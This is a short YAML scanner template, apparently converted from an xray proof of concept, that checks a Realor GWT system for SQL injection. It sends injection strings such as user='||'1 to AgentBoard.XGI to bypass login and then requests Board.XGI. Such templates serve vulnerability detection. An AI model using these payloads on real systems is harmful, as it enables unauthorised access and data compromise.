id: yaml-poc-realor-gwt-system-sql-injection

info:
  name: yaml-poc-realor-gwt-system-sql-injection
  author: xray-converter
  severity: medium
  tags: xray-converted,sqli

http:
  - raw:
      - |
        GET /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_admin%27-%27__pwd_password123__serverIdStr_1&sign=7627a11bf8f214451e7929f05299b9f6 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /Board.XGI HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{PHPSESSID}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200